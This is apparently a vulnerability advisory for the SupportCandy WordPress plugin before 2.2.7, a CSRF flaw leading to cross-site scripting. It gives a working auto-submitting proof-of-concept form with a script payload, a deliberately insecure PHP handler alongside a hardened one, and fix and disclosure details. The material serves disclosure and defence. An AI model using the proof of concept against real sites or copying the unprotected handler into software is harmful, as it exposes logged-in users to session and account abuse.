WordPress Plugin Vulnerabilities

SupportCandy < 2.2.7 - CSRF to Cross-Site Scripting

Description

The plugin does not have a CSRF check in the wpsc_tickets AJAX action, nor any sanitisation or escaping of some of the filter fields. This could allow attackers to make a logged-in user who has access to the ticket list dashboard set an arbitrary filter (stored in their cookies) containing an XSS payload.

Proof of Concept

<form action="https://example.com/wp-admin/admin-ajax.php" method="POST" id="csrf">
<input type="hidden" name="action" value="wpsc_tickets">
<input type="hidden" name="setting_action" value="set_custom_filter">
<input type="hidden" name="page_no" value="1">
<input type="hidden" name="custom_filter[s]" value="&quot;&gt;&lt;script&gt;alert(/XSS/)&lt;/script&gt;">
</form><script>csrf.submit()</script>

Go to https://example.com/wp-admin/admin.php?page=wpsc-tickets to trigger the XSS.
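As an added illustration (not SupportCandy's code; the handler, cookie and filter-key names are assumed), a hypothetical set_custom_filter handler in the weak shape the advisory describes, beside a hardened one that adds the nonce check, input sanitisation and output escaping:

```php
<?php
// Hypothetical handler for the set_custom_filter branch of a wpsc_tickets
// AJAX action. This is not SupportCandy's code; all names are assumed.

// Weak form, mirroring the two defects the advisory describes: no nonce
// check, and the submitted filter stored in a cookie without sanitisation.
function wpsc_set_custom_filter_weak() {
    $filter = isset( $_POST['custom_filter'] ) ? (array) $_POST['custom_filter'] : array();
    setcookie( 'wpsc_custom_filter', wp_json_encode( $filter ) );
    wp_die();
}

// Hardened form: verify the nonce, require a capability, whitelist keys,
// sanitise values, and set the cookie HttpOnly (and Secure over HTTPS).
function wpsc_set_custom_filter_hardened() {
    // Dies with 403 unless the 'nonce' field carries a value produced by
    // wp_create_nonce( 'wpsc_tickets' ) for the current user; a cross-site
    // form cannot know that value, so the CSRF vector is closed.
    check_ajax_referer( 'wpsc_tickets', 'nonce' );
    if ( ! current_user_can( 'read' ) ) {            // minimum capability (assumed)
        wp_send_json_error( 'forbidden', 403 );
    }
    $raw     = isset( $_POST['custom_filter'] ) && is_array( $_POST['custom_filter'] )
               ? wp_unslash( $_POST['custom_filter'] ) : array();
    $allowed = array( 's', 'status', 'priority' );    // accepted filter keys (assumed)
    $filter  = array();
    foreach ( $raw as $key => $value ) {
        if ( in_array( $key, $allowed, true ) ) {
            // sanitize_text_field() strips tags, so "><script>... cannot survive.
            $filter[ $key ] = sanitize_text_field( (string) $value );
        }
    }
    setcookie( 'wpsc_custom_filter', wp_json_encode( $filter ), 0, '/', '', is_ssl(), true );
    wp_send_json_success( $filter );
}

// Output side: whatever is read back from the cookie is escaped for its
// context, so even a stale unsanitised cookie value cannot become markup.
function wpsc_render_search_box( array $filter ) {
    $search = isset( $filter['s'] ) ? $filter['s'] : '';
    return '<input type="text" name="custom_filter[s]" value="' . esc_attr( $search ) . '">';
}

// The dashboard script would pass the nonce along, e.g. via wp_localize_script().
add_action( 'wp_ajax_wpsc_tickets', 'wpsc_set_custom_filter_hardened' );
```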

Affects Plugins

Fixed in 2.2.7

Classification

Miscellaneous

Original Researcher
apple502j
Submitter
apple502j
Verified
Yes

Timeline

Publicly Published
2022-01-05
Added
2022-01-05
Last Updated
2022-04-08
